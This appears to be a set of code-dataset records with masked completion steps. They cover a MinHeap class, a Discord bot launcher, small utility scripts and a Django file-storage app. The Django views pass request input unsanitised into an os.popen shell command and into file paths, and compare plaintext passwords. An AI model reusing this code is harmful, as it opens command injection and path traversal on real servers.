"step-4": "class MinHeap:\n __heap = [-0]\n\n def __init__(self):\n pass\n\n def insert(self, value):\n self.__heap.append(value)\n self.__sift_up()\n\n def pop(self):\n if len(self.__heap) == 1:\n return None\n minimum = self.__heap[1]\n if len(self.__heap) == 2:\n self.__heap.pop()\n else:\n self.__heap[1] = self.__heap.pop()\n self.__sift_down()\n return minimum\n\n def __sift_up(self):\n idx = len(self.__heap) - 1\n parent = idx >> 1\n while idx > 1 and self.__heap[idx] < self.__heap[parent]:\n tmp = self.__heap[idx]\n self.__heap[idx] = self.__heap[parent]\n self.__heap[parent] = tmp\n idx = parent\n parent = idx >> 1\n\n def __sift_down(self):\n idx = 1\n size = len(self.__heap)\n while idx < size:\n minimum = self.__heap[idx]\n left = idx << 1\n right = left + 1\n swap = None\n if left < size and self.__heap[left] < minimum:\n minimum = self.__heap[left]\n swap = left\n if right < size and self.__heap[right] < minimum:\n swap = right\n if swap is None:\n break\n tmp = self.__heap[swap]\n self.__heap[swap] = self.__heap[idx]\n self.__heap[idx] = tmp\n idx = swap\n",
"step-5": null,
"step-ids": [
4,
5,
6,
7
]
}
|
[
4,
5,
6,
7
] |
# BotSetup.py
from websockets.exceptions import InvalidStatusCode
from dokbot.DokBotCog import DokBotCog
from events.EventCog import EventCog
from dotenv import load_dotenv
from datetime import datetime
from .DokBot import DokBot
import utils.Logger as Log
import logging
import os
import sys
import traceback
import discord
def run() -> None:
os.environ['TZ'] = 'Europe/Brussels'
if sys.platform != 'win32':
from time import tzset
tzset()
print(datetime.now())
load_dotenv()
Log.setup()
token = os.getenv('DISCORD_BOT_TOKEN')
assert token, "Could not find any dokbot bot token"
intents = discord.Intents.default()
intents.members = True
prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'
bot = DokBot(command_prefix=prefix, intents=intents)
bot.add_cog(DokBotCog(bot))
bot.add_cog(EventCog(bot))
@bot.event
async def on_ready():
logging.getLogger().info(f'{bot.user.name} has connected.')
#
# @discord_client.event
# async def on_message(message: discord.Message) -> None:
# if not discord_client.is_ready() or message.author == discord_client.user:
# return
# try:
# await command_runner.run_command_for_message(message)
# except Exception as ex:
# await handle_exception(ex, author=message.author, content=message.content)
#
# @discord_client.event
# async def on_raw_reaction_add(reaction_event: discord.RawReactionActionEvent) -> None:
# if not discord_client.is_ready() or reaction_event.user_id == discord_client.user.id or reaction_event.emoji.name not in EMOJI_SIGNUP_STATUS.keys():
# return
# try:
# await signup_character(client=discord_client, reaction_event=reaction_event)
# except Exception as ex:
# user = await discord_client.fetch_user(reaction_event.user_id)
# await handle_exception(ex, author=user, content="Raid signup failed")
#
# async def handle_exception(ex: Exception, author: discord.User, content: str) -> None:
# Log.error(f"{author}, {content}, {ex}\n{traceback.format_exc()}")
# if isinstance(ex, BotException) and not isinstance(ex, InternalBotException):
# await author.send(ex.message)
# else:
# global maintainer
# if maintainer is None:
# maintainer = await discord_client.fetch_user(MAINTAINER_ID)
# await author.send(f"There were internal difficulties. Sending a message to {maintainer.display_name}")
# await maintainer.send(f'{author.display_name}, {content}, {ex}')
#
try:
bot.run(token)
except InvalidStatusCode as e:
error_message = f"Could not start client {e}\n{traceback.format_exc()}"
Log.error(error_message)
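# Assumed entry point elsewhere in the dokbot package (illustrative only,
# not shown in this file):
#
#   from dokbot import BotSetup
#   BotSetup.run()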
|
normal
|
{
"blob_id": "a7123fa221555b15162dbab0d93a86965190b805",
"index": 4141,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef run() ->None:\n os.environ['TZ'] = 'Europe/Brussels'\n if sys.platform != 'win32':\n from time import tzset\n tzset()\n print(datetime.now())\n load_dotenv()\n Log.setup()\n token = os.getenv('DISCORD_BOT_TOKEN')\n assert token, 'Could not find any dokbot bot token'\n intents = discord.Intents.default()\n intents.members = True\n prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'\n bot = DokBot(command_prefix=prefix, intents=intents)\n bot.add_cog(DokBotCog(bot))\n bot.add_cog(EventCog(bot))\n\n @bot.event\n async def on_ready():\n logging.getLogger().info(f'{bot.user.name} has connected.')\n try:\n bot.run(token)\n except InvalidStatusCode as e:\n error_message = f'Could not start client {e}\\n{traceback.format_exc()}'\n Log.error(error_message)\n",
"step-3": "from websockets.exceptions import InvalidStatusCode\nfrom dokbot.DokBotCog import DokBotCog\nfrom events.EventCog import EventCog\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nfrom .DokBot import DokBot\nimport utils.Logger as Log\nimport logging\nimport os\nimport sys\nimport traceback\nimport discord\n\n\ndef run() ->None:\n os.environ['TZ'] = 'Europe/Brussels'\n if sys.platform != 'win32':\n from time import tzset\n tzset()\n print(datetime.now())\n load_dotenv()\n Log.setup()\n token = os.getenv('DISCORD_BOT_TOKEN')\n assert token, 'Could not find any dokbot bot token'\n intents = discord.Intents.default()\n intents.members = True\n prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'\n bot = DokBot(command_prefix=prefix, intents=intents)\n bot.add_cog(DokBotCog(bot))\n bot.add_cog(EventCog(bot))\n\n @bot.event\n async def on_ready():\n logging.getLogger().info(f'{bot.user.name} has connected.')\n try:\n bot.run(token)\n except InvalidStatusCode as e:\n error_message = f'Could not start client {e}\\n{traceback.format_exc()}'\n Log.error(error_message)\n",
"step-4": "# BotSetup.py\nfrom websockets.exceptions import InvalidStatusCode\nfrom dokbot.DokBotCog import DokBotCog\nfrom events.EventCog import EventCog\nfrom dotenv import load_dotenv\nfrom datetime import datetime\nfrom .DokBot import DokBot\n\nimport utils.Logger as Log\nimport logging\nimport os\nimport sys\nimport traceback\nimport discord\n\n\ndef run() -> None:\n os.environ['TZ'] = 'Europe/Brussels'\n if sys.platform != 'win32':\n from time import tzset\n tzset()\n\n print(datetime.now())\n load_dotenv()\n Log.setup()\n\n token = os.getenv('DISCORD_BOT_TOKEN')\n assert token, \"Could not find any dokbot bot token\"\n\n intents = discord.Intents.default()\n intents.members = True\n\n prefix = '>' if os.getenv('APP_ENV') == 'development' else '!'\n bot = DokBot(command_prefix=prefix, intents=intents)\n bot.add_cog(DokBotCog(bot))\n bot.add_cog(EventCog(bot))\n\n @bot.event\n async def on_ready():\n logging.getLogger().info(f'{bot.user.name} has connected.')\n\n #\n # @discord_client.event\n # async def on_message(message: discord.Message) -> None:\n # if not discord_client.is_ready() or message.author == discord_client.user:\n # return\n # try:\n # await command_runner.run_command_for_message(message)\n # except Exception as ex:\n # await handle_exception(ex, author=message.author, content=message.content)\n #\n # @discord_client.event\n # async def on_raw_reaction_add(reaction_event: discord.RawReactionActionEvent) -> None:\n # if not discord_client.is_ready() or reaction_event.user_id == discord_client.user.id or reaction_event.emoji.name not in EMOJI_SIGNUP_STATUS.keys():\n # return\n # try:\n # await signup_character(client=discord_client, reaction_event=reaction_event)\n # except Exception as ex:\n # user = await discord_client.fetch_user(reaction_event.user_id)\n # await handle_exception(ex, author=user, content=\"Raid signup failed\")\n #\n # async def handle_exception(ex: Exception, author: discord.User, content: str) -> None:\n # Log.error(f\"{author}, {content}, {ex}\\n{traceback.format_exc()}\")\n # if isinstance(ex, BotException) and not isinstance(ex, InternalBotException):\n # await author.send(ex.message)\n # else:\n # global maintainer\n # if maintainer is None:\n # maintainer = await discord_client.fetch_user(MAINTAINER_ID)\n # await author.send(f\"There were internal difficulties. Sending a message to {maintainer.display_name}\")\n # await maintainer.send(f'{author.display_name}, {content}, {ex}')\n #\n try:\n bot.run(token)\n except InvalidStatusCode as e:\n error_message = f\"Could not start client {e}\\n{traceback.format_exc()}\"\n Log.error(error_message)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from text_to_word_cloud import *
from collections import Counter
from preprocess import *
if __name__ == '__main__':
data = load_data('train.json')
words = text_to_words(get_all_text(data), as_set=False)
cnt = Counter(words)
save_il_to_word_cloud_file("cloudofw.txt",cnt,len(words),call_R=True)
|
normal
|
{
"blob_id": "b3bba1119bfaf0c1e684e8835259ec6fa8c42cf7",
"index": 1838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n data = load_data('train.json')\n words = text_to_words(get_all_text(data), as_set=False)\n cnt = Counter(words)\n save_il_to_word_cloud_file('cloudofw.txt', cnt, len(words), call_R=True)\n",
"step-3": "from text_to_word_cloud import *\nfrom collections import Counter\nfrom preprocess import *\nif __name__ == '__main__':\n data = load_data('train.json')\n words = text_to_words(get_all_text(data), as_set=False)\n cnt = Counter(words)\n save_il_to_word_cloud_file('cloudofw.txt', cnt, len(words), call_R=True)\n",
"step-4": "from text_to_word_cloud import *\r\nfrom collections import Counter\r\nfrom preprocess import *\r\n\r\n\r\nif __name__ == '__main__':\r\n data = load_data('train.json')\r\n words = text_to_words(get_all_text(data), as_set=False)\r\n cnt = Counter(words)\r\n save_il_to_word_cloud_file(\"cloudofw.txt\",cnt,len(words),call_R=True)\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import pandas as pd
import random
import string
import names
def generatetest(n=100, filename="test_data"):
ids = []
names_list = []
for _ in range(n):
ids.append(''.join(random.choices(
string.ascii_letters + string.digits, k=9)))
names_list.append(names.get_full_name())
df = pd.DataFrame({
'id': ids,
'names': names_list,
})
df.to_csv('tmp/{}.csv'.format(filename), index=False)
if __name__ == "__main__":
generatetest()
print("test set generated!")
|
normal
|
{
"blob_id": "aa913fd40a710cfd7288fd59c4039c4b6a5745cc",
"index": 4569,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef generatetest(n=100, filename='test_data'):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(string.ascii_letters + string.\n digits, k=9)))\n names_list.append(names.get_full_name())\n df = pd.DataFrame({'id': ids, 'names': names_list})\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef generatetest(n=100, filename='test_data'):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(string.ascii_letters + string.\n digits, k=9)))\n names_list.append(names.get_full_name())\n df = pd.DataFrame({'id': ids, 'names': names_list})\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\nif __name__ == '__main__':\n generatetest()\n print('test set generated!')\n",
"step-4": "import pandas as pd\nimport random\nimport string\nimport names\n\n\ndef generatetest(n=100, filename='test_data'):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(string.ascii_letters + string.\n digits, k=9)))\n names_list.append(names.get_full_name())\n df = pd.DataFrame({'id': ids, 'names': names_list})\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\nif __name__ == '__main__':\n generatetest()\n print('test set generated!')\n",
"step-5": "import pandas as pd\nimport random\nimport string\nimport names\n\n\ndef generatetest(n=100, filename=\"test_data\"):\n ids = []\n names_list = []\n for _ in range(n):\n ids.append(''.join(random.choices(\n string.ascii_letters + string.digits, k=9)))\n names_list.append(names.get_full_name())\n\n df = pd.DataFrame({\n 'id': ids,\n 'names': names_list,\n })\n df.to_csv('tmp/{}.csv'.format(filename), index=False)\n\n\nif __name__ == \"__main__\":\n generatetest()\n print(\"test set generated!\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
l, w, h = map(int, input().split())
TSA = 2 * (l * w + w * h + h * l)
V = l * w * h
print(TSA, V)
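# Worked example: input "2 3 4" gives TSA = 2*(2*3 + 3*4 + 4*2) = 52 and V = 2*3*4 = 24.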
|
normal
|
{
"blob_id": "d3382ead1d98ba2fb15fe3ea277430f1bb07131c",
"index": 2544,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(TSA, V)\n",
"step-3": "l, w, h = map(int, input().split())\nTSA = 2 * (l * w + w * h + h * l)\nV = l * w * h\nprint(TSA, V)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import os
import shutil
import json
from django.shortcuts import render, HttpResponse
from django.utils.encoding import escape_uri_path
from django.db import transaction
from web_pan.settings import files_folder
from disk import models
# Create your views here.
def logined(func):
def wrapper(request, *args, **kwargs):
session = request.session.get('user')
if not session:
return render(request, 'login.html')
else:
return func(request, *args, **kwargs)
return wrapper
def api_check(func):
def wrapper(request, *args, **kwargs):
session = request.session.get('user')
if not session:
res = dict(
state_code=-3,
error_msg="登陆过期"
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
else:
return func(request, *args, **kwargs)
return wrapper
def login(request):
if request.method == 'GET':
if request.session.get('user'):
return render(request, 'index.html')
return render(request, 'login.html')
else:
req = json.loads(request.body)
user = req.get('username')
pwd = req.get('pwd')
obj_user = models.Users.objects.filter(user_name=user).all()
if not obj_user:
res = dict(
state_code=1,
error_msg="用户不存在"
)
else:
password = obj_user.first().password
if str(pwd) != str(password):
res = dict(
state_code=2,
error_msg="密码错误"
)
else:
request.session['user'] = user
request.session.set_expiry(60*60*4)
res = dict(
state_code=0,
error_msg="密码错误"
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
def logout(request):
if request.session.get('user'):
del request.session['user']
return render(request, 'login.html')
@logined
def index(request):
return render(request, 'index.html')
@api_check
def get_dir_list(request):
user = request.session.get('user')
obj_dir = models.Dirs.objects.filter(user_name=user).all()
dir_list = []
for dirs in obj_dir:
user_dir = dirs.dir
dir_list.append(user_dir)
res = dict(
state_code=0,
error_msg='ok',
data={
"dir_list": dir_list
}
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def user_mkdir(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
if not dir_name:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
dir_path = os.path.join(files_folder, dir_name)
if os.path.exists(dir_path):
res = dict(
state_code=1,
error_msg="该目录已被使用"
)
else:
user = request.session.get('user')
if user:
models.Dirs.objects.create(
user_name=user,
dir=dir_name
)
os.mkdir(dir_path)
res = dict(
state_code=0,
error_msg='ok'
)
else:
res = dict(
state_code=-3,
error_msg="登陆过期"
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def del_dir(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
if not dir_name:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
dir_path = os.path.join(files_folder, dir_name)
if not os.path.exists(dir_path):
res = dict(
state_code=1,
error_msg='目录不存在'
)
else:
with transaction.atomic():
obj_dir = models.Dirs.objects.filter(dir=dir_name).all()
if obj_dir:
obj_dir.delete()
shutil.rmtree(dir_path)
res = dict(
state_code=0,
                error_msg='ok'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def upload_file(request):
dir_name = request.POST.get('dir_name')
if not dir_name:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
dir_path = os.path.join(files_folder, dir_name)
if not os.path.exists(dir_path):
res = dict(
state_code=1,
error_msg='目录不存在'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
    # Get the uploaded file; default to None if no file was sent
File = request.FILES.get("file", None)
if File is None:
res = dict(
state_code=-2,
error_msg='参数错误'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
file_name = File.name
file_path = os.path.join(dir_path, file_name)
    # Open the target file for binary writing
with open(file_path, 'wb+') as f:
        # Write the uploaded file in chunks
for chunk in File.chunks():
f.write(chunk)
res = dict(
state_code=0,
error_msg='ok',
)
return HttpResponse(json.dumps(res), content_type='application/json')
@api_check
def query_file(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
dir_path = os.path.join(files_folder, dir_name)
cmd_info = os.popen("ls -l -h {}".format(dir_path)).read()
file_list = cmd_info.split('\n')[1:-1]
file_list_data = []
for file_info_cmd in file_list:
file_info_list = file_info_cmd.split(' ')
file_info = list(filter(None, file_info_list))
file = file_info[-1]
file_size = file_info[4]
name_type = file.rsplit('.', 1)
if len(name_type) < 2:
name_type.append('未知')
file_name, file_type = name_type
file_list_data.append({
'file_name': file_name,
'file_type': file_type,
'file_size': file_size
})
res = dict(
state_code=0,
error_msg='ok',
data={
'file_list': file_list_data
}
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def del_file(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
file_name = req.get('file_name')
file_type = req.get('file_type')
file = file_name + '.' + file_type if file_type != '未知' else file_name
file_path = os.path.join(os.path.join(files_folder,dir_name),file)
if not os.path.exists(file_path):
res = dict(
state_code=1,
error_msg='文件不存在'
)
else:
os.remove(file_path)
res = dict(
state_code=0,
error_msg='ok'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
@api_check
def download_file(request):
req = json.loads(request.body)
dir_name = req.get('dir_name')
file_name = req.get('file_name')
file_type = req.get('file_type')
file = file_name+'.'+file_type if file_type != '未知' else file_name
file_path = os.path.join(os.path.join(files_folder,dir_name),file)
if not os.path.exists(file_path):
res = dict(
state_code=1,
error_msg='文件不存在'
)
return HttpResponse(json.dumps(res, ensure_ascii=False), content_type='application/json')
from django.http import StreamingHttpResponse
file_size = os.path.getsize(file_path)
    def file_iterator(file_name, chunk_size=512):  # yields the file as binary chunks
with open(file_name, 'rb') as f:
while True:
c = f.read(chunk_size)
if c:
yield c
else:
break
    the_file_name = file_path  # path of the file to be downloaded
res = file_iterator(the_file_name)
    response = StreamingHttpResponse(res)  # build the streaming response
    response['Content-Type'] = 'application/octet-stream; charset=UTF-8'  # note the content type
response['Content-Length'] = file_size
    response['Content-Disposition'] = 'attachment;filename="{}"'.format(escape_uri_path(file))  # the filename here is what the download is saved as
return response
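# Assumed URL wiring for the views above (illustrative only -- the real
# urls.py is not included in this snippet):
#   path('login/', views.login), path('logout/', views.logout),
#   path('dir/list/', views.get_dir_list), path('dir/create/', views.user_mkdir),
#   path('dir/delete/', views.del_dir), path('file/upload/', views.upload_file),
#   path('file/list/', views.query_file), path('file/delete/', views.del_file),
#   path('file/download/', views.download_file)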
|
normal
|
{
"blob_id": "eeb87891d1a02484a61537745ec6f13387017929",
"index": 705,
"step-1": "<mask token>\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n<mask token>\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': 
file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n<mask token>\n\n\n@api_check\ndef upload_file(request):\n dir_name = request.POST.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n File = request.FILES.get('file', None)\n if File is None:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n file_name = File.name\n file_path = os.path.join(dir_path, file_name)\n with open(file_path, 'wb+') as f:\n for chunk in File.chunks():\n f.write(chunk)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res), content_type='application/json')\n\n\n@api_check\ndef query_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n dir_path = os.path.join(files_folder, dir_name)\n cmd_info = os.popen('ls -l -h {}'.format(dir_path)).read()\n file_list = cmd_info.split('\\n')[1:-1]\n file_list_data = []\n for file_info_cmd in file_list:\n file_info_list = file_info_cmd.split(' ')\n file_info = list(filter(None, file_info_list))\n file = file_info[-1]\n file_size = file_info[4]\n name_type = file.rsplit('.', 1)\n if len(name_type) < 2:\n name_type.append('未知')\n file_name, file_type = name_type\n file_list_data.append({'file_name': file_name, 'file_type':\n file_type, 'file_size': 
file_size})\n res = dict(state_code=0, error_msg='ok', data={'file_list': file_list_data}\n )\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n else:\n os.remove(file_path)\n res = dict(state_code=0, error_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef download_file(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n file_name = req.get('file_name')\n file_type = req.get('file_type')\n file = file_name + '.' + file_type if file_type != '未知' else file_name\n file_path = os.path.join(os.path.join(files_folder, dir_name), file)\n if not os.path.exists(file_path):\n res = dict(state_code=1, error_msg='文件不存在')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n from django.http import StreamingHttpResponse\n file_size = os.path.getsize(file_path)\n\n def file_iterator(file_name, chunk_size=512):\n with open(file_name, 'rb') as f:\n while True:\n c = f.read(chunk_size)\n if c:\n yield c\n else:\n break\n the_file_name = file_path\n res = file_iterator(the_file_name)\n response = StreamingHttpResponse(res)\n response['Content-Type'] = 'application/octet-stream; charset=UTF-8'\n response['Content-Length'] = file_size\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(\n escape_uri_path(file))\n return response\n",
"step-3": "<mask token>\n\n\ndef logined(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n return render(request, 'login.html')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef api_check(func):\n\n def wrapper(request, *args, **kwargs):\n session = request.session.get('user')\n if not session:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n else:\n return func(request, *args, **kwargs)\n return wrapper\n\n\ndef login(request):\n if request.method == 'GET':\n if request.session.get('user'):\n return render(request, 'index.html')\n return render(request, 'login.html')\n else:\n req = json.loads(request.body)\n user = req.get('username')\n pwd = req.get('pwd')\n obj_user = models.Users.objects.filter(user_name=user).all()\n if not obj_user:\n res = dict(state_code=1, error_msg='用户不存在')\n else:\n password = obj_user.first().password\n if str(pwd) != str(password):\n res = dict(state_code=2, error_msg='密码错误')\n else:\n request.session['user'] = user\n request.session.set_expiry(60 * 60 * 4)\n res = dict(state_code=0, error_msg='密码错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n\n\ndef logout(request):\n if request.session.get('user'):\n del request.session['user']\n return render(request, 'login.html')\n\n\n@logined\ndef index(request):\n return render(request, 'index.html')\n\n\n@api_check\ndef get_dir_list(request):\n user = request.session.get('user')\n obj_dir = models.Dirs.objects.filter(user_name=user).all()\n dir_list = []\n for dirs in obj_dir:\n user_dir = dirs.dir\n dir_list.append(user_dir)\n res = dict(state_code=0, error_msg='ok', data={'dir_list': dir_list})\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef user_mkdir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='该目录已被使用')\n else:\n user = request.session.get('user')\n if user:\n models.Dirs.objects.create(user_name=user, dir=dir_name)\n os.mkdir(dir_path)\n res = dict(state_code=0, error_msg='ok')\n else:\n res = dict(state_code=-3, error_msg='登陆过期')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef del_dir(request):\n req = json.loads(request.body)\n dir_name = req.get('dir_name')\n if not dir_name:\n res = dict(state_code=-2, error_msg='参数错误')\n return HttpResponse(json.dumps(res, ensure_ascii=False),\n content_type='application/json')\n dir_path = os.path.join(files_folder, dir_name)\n if not os.path.exists(dir_path):\n res = dict(state_code=1, error_msg='目录不存在')\n else:\n with transaction.atomic():\n obj_dir = models.Dirs.objects.filter(dir=dir_name).all()\n if obj_dir:\n obj_dir.delete()\n shutil.rmtree(dir_path)\n res = dict(state_code=0, eror_msg='ok')\n return HttpResponse(json.dumps(res, ensure_ascii=False), content_type=\n 'application/json')\n\n\n@api_check\ndef upload_file(request):\n 